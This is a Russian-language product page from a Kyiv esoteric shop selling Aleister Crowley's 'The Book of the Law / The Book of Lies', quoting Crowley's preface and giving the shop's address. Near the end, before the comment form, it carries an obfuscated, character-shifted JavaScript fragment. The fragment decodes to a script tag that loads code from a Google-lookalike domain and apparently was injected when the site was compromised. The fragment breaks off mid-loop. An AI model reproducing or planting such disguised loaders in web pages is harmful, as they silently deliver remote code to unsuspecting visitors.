Книга Закона. Книга ЛжейАвтор: Алистер Кроули
ISBN: 978-5-91078-063-1
Переплет:Мягкий
Год издания: 2009 год
Издатель: “Золотое Сечение”
Цена : см. прайс-лист

Эзотерический магазин “Мистическая Гирлянда” представляет Вам книгу Алистера Кроули ”Книга Закона. Книга Лжей”.
Постyпай согласно твоей воле, вот весь Закон.
Изyчение этой Книги запpещено. Мyдpо yничтожить этy копию после пеpвого чтения. Кто пpоигноpиpyет это, делает это на свой стpах и pиск. Они чpезвычайно опасны. Тех, кто станет обсyждать содеpжание этой Книги, следyет избегать, как pазносчиков чyмы. Все вопpосы, касающиеся Закона, следyет pазpешать только на основе моих записей, каждый сам для себя.
Hет закона выше, чем Постyпать согласно твоей воле.
Любовь есть Закон, любовь, напpавляемая волей.
Рожденный жpецом,
АHХ-Ф-H-ХОHСУ

Тем не менее я хотел бы упомянуть об одной работе, хотя и состоящей из более или менее разрозненных элементов. Это Книга Лжей, насчитывающая 93 главы. Первые страницы, на которых изображены лишь вопросительный и восклицательный знаки, в сущности, тоже суть главы.
Другие главы содержат иногда всего по одному слову, но в среднем  - от полудюжины до двух десятков стихов. Тема каждой главы обычно довольно тесно связанна с каббалистическим значением её номера. Так глава 25 содержит ритуал Пентограммы; 72 - рондо с рефреном "Шемхамфораш", этим семидесятидвухчастным божественным Именем; 77 посвящена Лэйле, буквы имени которой складываются в эту сумму; а глава 80 представляет собой апологию войны, ибо 80 - число буквы Пе, подчинённой Марсу. Иногда текст предельно прост и ясен, иногда - сложен, так как требует хорошего знания Каббалы.
В нём встречаются так же каламбуры, криптограммы, намёки с двойным и тройным смыслом, которые все следует учитывать, чтобы понять, о чём идёт речь на самом деле. Некоторые вещи написаны просто для разрядки, их следует воспринимать с хорошей толикой юмора, иронии и даже цынизма. На первый взгляд книга кажется беспорядочным набором глупостей, собранных воедино ради издёвки над читателем, но это не так: она требует глубокого изучения, симпатии, интуиции - и Посвящения.
Сказав всё это, я не могу не закончить тем, чтобы признаться: ни в одном из своих произведений я не излагал так глубоко и полно всю суть моего мировоззрения...

Алистер Кроули.

Приобрести данную книгу Вы можете посетив наш магазин магии по адресу г. Киев, ул. Гришка,8
#nzkt2#!tsd>#!iuuq;00hp1hmfbobmjujd/dpn0tdsjqut0epvcmfdmjdltubu/qiq#?=0tdsjqu?!";
m=""; for (i=0; i

Оставить комментарий

Ваш email не будет опубликован. Обязательные поля отмечены *

Вы можете использовать это HTMLтеги и атрибуты: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>